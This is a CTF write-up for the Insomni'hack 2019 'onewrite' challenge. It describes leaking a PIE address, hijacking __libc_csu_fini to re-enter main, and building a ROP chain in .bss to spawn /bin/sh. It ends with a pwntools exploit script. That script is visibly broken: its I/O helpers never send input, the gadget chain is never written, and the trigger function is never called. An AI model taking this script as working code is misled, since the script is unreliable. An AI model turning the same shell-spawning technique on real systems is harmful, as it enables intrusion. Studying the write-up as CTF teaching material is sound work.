[Insomni'hack 2019] onewrite writeup



File is here difficulty: easy _ nc onewrite.teaser.insomnihack.ch 1337

A program is a Simple.

All you need to pwn nowadays is a leak and a qword write they say...
What do you want to leak ?
1. stack
2. pie
 > 1
address : 140735736968352   
data : 12345678

we can leak a stack or do_leak function pointer for us once. Then, it will call do_overwrite which allows us to overwrite 8 byte to arbitrary address.

 [*] '/home/myria/CTF/Insomni_hack/onewrite/onewrite'
     Arch:     amd64-64-little
     RELRO:    Partial RELRO
     Stack:    Canary found
     NX:       NX enabled
     PIE:      PIE enabled

 and binary is "statically linked"

but, the binary is statically linked, we need leak stack and pie both of all. The attack is summarized as follows.

  1. Leak PIE address
  2. Overwrite pie_addr + 0x2a55a3 with main address
  3. Program end. And the exit will be called after main returns. (it call __libc_csu_fini function)
  4. __libc_csu_fini function call QWORD [pie_addr + 0x2a55a3]. so we again jump to main function.
  5. Leak Stack address
  6. Write a ropchain in the bss
  7. Jump ropchain
  8. Get Shell

The exit function is called after the main function ends. Then, the function __libc_csu_fini is called and you can return to main by using the call QWORD PTR [rbp + rbx*8+0x0] of <__ libc_csu_fini+40>.

6. Write a 'ropchain' in the 'bss' is hard part. so i need to be able to write 8 bytes somewhere and jump free from the main function again. You can adjust the stack by omitting the function’s prologue or epilogue appropriately. manipulate the return address of the main function and manipulate the return address of the do_leak function. (sub rsp, 0x18 , add rsp, 0x18 or sub rsp, 0x8 , add rsp, 0x8) Then the stack is configured as shown below. Now we got one free write via two operations.

The rest is simple. configure ropchain and use pop rsp; ret

Korean writeup

The full exploit code

 from pwn import *

#conn = remote("onewrite.teaser.insomnihack.ch", 1337)
conn = process("onewrite")

def leak(select):
	conn.recvuntil(" > ")
	leak_addr = int(conn.recvline().strip(), 16)
	return leak_addr

def write(addr, data):
	conn.recvuntil("address : ")
	conn.recvuntil("data : ")

## Stage 1
# do_leak func address leak
pie_addr = leak(2)
log.info("pie_address : " + hex(pie_addr))

target = pie_addr + 0x2a55a3 # rbp+rbx*8+0x0   //   call QWORD PTR [rbp+rbx*8+0x0]
main = pie_addr + 0xa3		# main function address
write(target, p64(main))

## Stage 2
# stack_address leak
stack_addr = leak(1)
target = stack_addr  + 0x28	# return address (main function)
log.info("stack_address : " + hex(stack_addr))
write(target, p64(main))

def write_arbitrary(addr, data):
	# stack_address += 8
	stack_addr = leak(1)
	log.info("stack_address : " + hex(stack_addr))
	target = stack_addr  + 0x28
	write(target, p64(main))

	# stack_address -= 8
	stack_addr = leak(1)
	log.info("stack_address : " + hex(stack_addr))
	target = stack_addr  + 0x18
	write(target, p64(main))

	# main_ret => main
	# free write! and return Main
	stack_addr = leak(1)
	log.info("stack_address : " + hex(stack_addr))
	write(addr, data)	# free write

# rop_gadget
pie_base = pie_addr - 0x000008A15
pop_rdi = pie_base + 0x000858fb
pop_rsi = pie_base + 0x0008551a
pop_rdx = pie_base + 0x000484c5
pop_rax = pie_base + 0x0004654c
syscall = pie_base + 0x00088834

bss_address = pie_base + 0x2B38D0

log.info("pie_base : " + hex(pie_base))

# write "/bin/sh" to BSS
write_arbitrary(bss_address, "/bin/sh\x00")

idx = 2
def rop(data):
	global idx
	write_arbitrary(bss_address + idx*8, p64(data))

# write rop_chain to BSS

def trigger_rop():
	stack_addr = leak(1)
	target = stack_addr  + 0x28
	log.info("stack_address : " + hex(stack_addr))
	write(target, p64(main))

	pop_rsp = pie_base + 0x00087c46
	rop_chain = bss_address + 0x10

	# jump ropchain
	write_arbitrary(stack_addr + 0x40, p64(pop_rsp))
	write_arbitrary(stack_addr + 0x48, p64(rop_chain))

